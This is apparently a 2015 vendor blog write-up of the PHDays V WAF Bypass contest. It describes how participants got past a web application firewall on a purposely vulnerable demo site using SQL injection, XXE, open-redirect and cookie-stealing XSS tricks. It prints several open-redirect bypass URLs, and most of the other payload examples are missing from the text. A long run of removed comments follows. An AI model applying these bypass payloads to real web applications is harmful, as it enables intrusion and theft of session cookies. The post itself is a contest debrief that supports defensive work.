June 3, 2015

WAF Bypass at Positive Hack Days V


As it did last year, the PHDays forum on information security hosted WAF Bypass this year as well. The contest's participants tried to bypass the protection of PT Application Firewall, Positive Technologies' product. For this contest, the organizers developed the site Choo Roads, which contained common vulnerabilities, such as Cross-Site Scripting, SQL Injection, XML External Entities Injection, Open Redirect. Upon exploiting one of the vulnerabilities, a participant obtained a flag in the MD5 format and gained points. MD5 flags could be found in the file system, database, and cookie parameters and detected by a special bot that was developed by using Selenium.

Though the contest WAF configuration allowed bypassing, uncommon solutions were also presented. This was actually the goal of the contest: participants had the opportunity to try themselves in bypassing protection mechanisms, while we can improve our product due to the results. Let's have a look at those vulnerabilities and bypass techniques.

Warmup

The vulnerability was in the script that tracked user activity on the site.

POST /online.php HTTP/1.1
Host: choo-choo.phdays.com
Connection: keep-alive
Content-Length: 24
Content-Type: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36

{"timestamp":1432906707}

Timestamp field values from the JSON data in the POST request were not validated before using them in the SQL request:
To bypass the check, you could substitute Content-Type with text/xml, and as a result the POST data were not processed as JSON (the check was disabled).

XSD validation

The site had a form for searching tickets by forming XML and sending the request to the back end.
XSD was used for the XML request.

According to the schema, the id attribute should contain 35 characters. The attribute value was added into the SQL request without validation. Bypassing required a vector that meets XSD requirements.

Open Redirect



The vulnerability was in the "to" parameter of the script redirect.php. The flag was sent to fragment portions of URL where the redirection was executed, i.e. it wasn't sent to the server end. To get the flag, you should send the bot to another site with a page that could retrieve the value from location.hash and send it to the logger.

Bypassing options:

http://choo-choo.phdays.com/redirect.php?to=phdays.com:asd@host.com
http://choo-choo.phdays.com/redirect.php?to=http://ahack.ru%23.phdays.com/
http://choo-choo.phdays.com/redirect.php to=http%3a//www.samincube.com%3f\..\\www.phdays.com

XML External Entities Injection

The script that handled XML data was vulnerable to XXE. Bypassing required using of the external entity in the parameter entity:

It was also possible to bypass it with UTF-16.

Cross-Site Scripting

The vulnerability was in the site's search page. To obtain the flag, you could send the bot's cookies to the site. Bypassing required using non-standard tag attributes that are processed by bootstrap-validator allowing executing the JS code:

Or:


Results


The winner of the contest is bushwhackers: Georgy Noseevich, Andrey Petukhov, and Alexander Razdobarov. The team solved all the tasks during the first day! (They won the last year's competition as well.) Mikhail Stepankin (ArtSploit) took second place, Eldar Zaitov (kyprizel) was the third. The winner received an iPad Air 2; a Sony Xperia Z3 went to the second place team; the third place team received a license for Burp Suite Professional.

During the contest, 271,390 requests were blocked (twice as many as during the last year's contest). This time, 302 contestants registered (compared to 101 last year). Only 18 participants managed to capture at least one flag.



Thanks to everyone who took part in the contest.

112 comments:

  1. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. This comment has been removed by a blog administrator.

      Delete
    2. This comment has been removed by a blog administrator.

      Delete
    3. This comment has been removed by a blog administrator.

      Delete
    4. This comment has been removed by a blog administrator.

      Delete
    5. This comment has been removed by a blog administrator.

      Delete
    6. This comment has been removed by a blog administrator.

      Delete
    7. This comment has been removed by a blog administrator.

      Delete
    8. This comment has been removed by a blog administrator.

      Delete
    9. This comment has been removed by a blog administrator.

      Delete
    10. This comment has been removed by a blog administrator.

      Delete
    11. This comment has been removed by a blog administrator.

      Delete
    12. This comment has been removed by a blog administrator.

      Delete
    13. This comment has been removed by a blog administrator.

      Delete
    14. This comment has been removed by a blog administrator.

      Delete
    15. This comment has been removed by a blog administrator.

      Delete
    16. This comment has been removed by a blog administrator.

      Delete
  2. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. This comment has been removed by a blog administrator.

      Delete
    2. This comment has been removed by a blog administrator.

      Delete
  3. This comment has been removed by a blog administrator.

    ReplyDelete
  4. This comment has been removed by a blog administrator.

    ReplyDelete
  5. This comment has been removed by a blog administrator.

    ReplyDelete
  6. This comment has been removed by a blog administrator.

    ReplyDelete
  7. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. This comment has been removed by a blog administrator.

      Delete
    2. This comment has been removed by a blog administrator.

      Delete
    3. This comment has been removed by a blog administrator.

      Delete
    4. This comment has been removed by a blog administrator.

      Delete
  8. This comment has been removed by a blog administrator.

    ReplyDelete
  9. This comment has been removed by a blog administrator.

    ReplyDelete
  10. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. This comment has been removed by a blog administrator.

      Delete
  11. This comment has been removed by a blog administrator.

    ReplyDelete
  12. This comment has been removed by a blog administrator.

    ReplyDelete
  13. This comment has been removed by a blog administrator.

    ReplyDelete
  14. This comment has been removed by a blog administrator.

    ReplyDelete
  15. This comment has been removed by a blog administrator.

    ReplyDelete
  16. This comment has been removed by a blog administrator.

    ReplyDelete
  17. This comment has been removed by a blog administrator.

    ReplyDelete
  18. This comment has been removed by a blog administrator.

    ReplyDelete
  19. This comment has been removed by a blog administrator.

    ReplyDelete
  20. This comment has been removed by a blog administrator.

    ReplyDelete
  21. This comment has been removed by a blog administrator.

    ReplyDelete
  22. This comment has been removed by a blog administrator.

    ReplyDelete
  23. This comment has been removed by a blog administrator.

    ReplyDelete
  24. This comment has been removed by a blog administrator.

    ReplyDelete
  25. This comment has been removed by a blog administrator.

    ReplyDelete
  26. This comment has been removed by a blog administrator.

    ReplyDelete
  27. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. This comment has been removed by a blog administrator.

      Delete
  28. This comment has been removed by a blog administrator.

    ReplyDelete
  29. This comment has been removed by a blog administrator.

    ReplyDelete
  30. This comment has been removed by a blog administrator.

    ReplyDelete
  31. This comment has been removed by a blog administrator.

    ReplyDelete
  32. This comment has been removed by a blog administrator.

    ReplyDelete
  33. This comment has been removed by a blog administrator.

    ReplyDelete
  34. This comment has been removed by a blog administrator.

    ReplyDelete
  35. This comment has been removed by a blog administrator.

    ReplyDelete
  36. This comment has been removed by a blog administrator.

    ReplyDelete
  37. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. This comment has been removed by a blog administrator.

      Delete
    2. This comment has been removed by a blog administrator.

      Delete
  38. This comment has been removed by a blog administrator.

    ReplyDelete
  39. This comment has been removed by a blog administrator.

    ReplyDelete
  40. This comment has been removed by a blog administrator.

    ReplyDelete
  41. This comment has been removed by a blog administrator.

    ReplyDelete
  42. This comment has been removed by a blog administrator.

    ReplyDelete
  43. This comment has been removed by a blog administrator.

    ReplyDelete
  44. This comment has been removed by a blog administrator.

    ReplyDelete
  45. This comment has been removed by a blog administrator.

    ReplyDelete
  46. This comment has been removed by a blog administrator.

    ReplyDelete
  47. This comment has been removed by a blog administrator.

    ReplyDelete
  48. This comment has been removed by a blog administrator.

    ReplyDelete
  49. This comment has been removed by a blog administrator.

    ReplyDelete
  50. This comment has been removed by a blog administrator.

    ReplyDelete
  51. This comment has been removed by a blog administrator.

    ReplyDelete
  52. This comment has been removed by a blog administrator.

    ReplyDelete
  53. This comment has been removed by a blog administrator.

    ReplyDelete
  54. This comment has been removed by a blog administrator.

    ReplyDelete
  55. This comment has been removed by a blog administrator.

    ReplyDelete
  56. This comment has been removed by a blog administrator.

    ReplyDelete
  57. This comment has been removed by a blog administrator.

    ReplyDelete
  58. This comment has been removed by a blog administrator.

    ReplyDelete
  59. This comment has been removed by a blog administrator.

    ReplyDelete
    Replies
    1. This comment has been removed by a blog administrator.

      Delete
  60. This comment has been removed by a blog administrator.

    ReplyDelete
  61. This comment has been removed by a blog administrator.

    ReplyDelete
  62. This comment has been removed by a blog administrator.

    ReplyDelete
  63. This comment has been removed by a blog administrator.

    ReplyDelete
  64. This comment has been removed by a blog administrator.

    ReplyDelete
  65. This comment has been removed by a blog administrator.

    ReplyDelete
  66. This comment has been removed by a blog administrator.

    ReplyDelete
  67. This comment has been removed by a blog administrator.

    ReplyDelete
  68. This comment has been removed by a blog administrator.

    ReplyDelete
  69. This comment has been removed by a blog administrator.

    ReplyDelete
  70. This comment has been removed by a blog administrator.

    ReplyDelete
  71. This comment has been removed by a blog administrator.

    ReplyDelete
  72. This comment has been removed by a blog administrator.

    ReplyDelete
  73. This comment has been removed by a blog administrator.

    ReplyDelete
  74. This comment has been removed by a blog administrator.

    ReplyDelete
  75. This comment has been removed by a blog administrator.

    ReplyDelete
  76. This comment has been removed by a blog administrator.

    ReplyDelete
  77. This comment has been removed by a blog administrator.

    ReplyDelete
  78. This comment has been removed by a blog administrator.

    ReplyDelete
  79. This comment has been removed by a blog administrator.

    ReplyDelete
  80. This comment has been removed by a blog administrator.

    ReplyDelete
  81. This comment has been removed by a blog administrator.

    ReplyDelete
  82. This comment has been removed by a blog administrator.

    ReplyDelete
  83. This comment has been removed by a blog administrator.

    ReplyDelete
  84. This comment has been removed by a blog administrator.

    ReplyDelete
  85. This comment has been removed by a blog administrator.

    ReplyDelete